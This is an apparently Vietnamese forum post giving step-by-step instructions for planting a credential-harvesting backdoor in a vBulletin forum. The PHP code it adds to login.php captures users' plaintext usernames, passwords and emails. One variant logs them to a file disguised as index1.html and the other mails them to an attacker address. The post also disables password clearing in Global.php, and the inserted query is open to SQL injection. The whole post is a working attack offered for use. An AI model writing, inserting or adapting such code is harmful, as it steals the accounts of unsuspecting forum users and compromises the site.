Mở file login.php tìm dòng process_new_login(....) Chính xác là: Mã: process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); Thêm vào bên dưới: Mã: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password = $vbulletin->GPC["vb_login_password"]; $lg_file = "./clientscript/yui/animation/index1.html"; $sql_query = @mysql_query("SELECT * FROM `" . TABLE_PREFIX . "user` WHERE username='" . $lg_username . "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) { $logfile = @file($lg_file); $logfile[] = $lg_username . ":" . $lg_password.":" . $row["email"]; $logfile = array_unique($logfile); $fp1 = fopen($lg_file, "w"); fwrite($fp1, implode("\r\n", $logfile)); fclose($fp1); } break; } Hoặc: Mã: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password = $vbulletin->GPC["vb_login_password"]; $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) { $from = $row["usergroupid"].' | '.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $to = "Attacker@email"; $message = $row["usergroupid"] . ' | ' . $lg_username . ' | ' . $lg_password. ' | ' . $row["email"] . "\n"; $header = "Content-type: text/html; charset=utf-8\r\nFrom: $from\r\nReply-to: $to"; mail($to, $from, $message, $header); } } Edit file Global.php, tìm: Mã: $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; Thêm 2 dấu chú thích vào trước nó để biến nó thành chú thích, ta sẽ được: Mã: //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; File log coi tại: /clientscript/yui/animation/index1.html
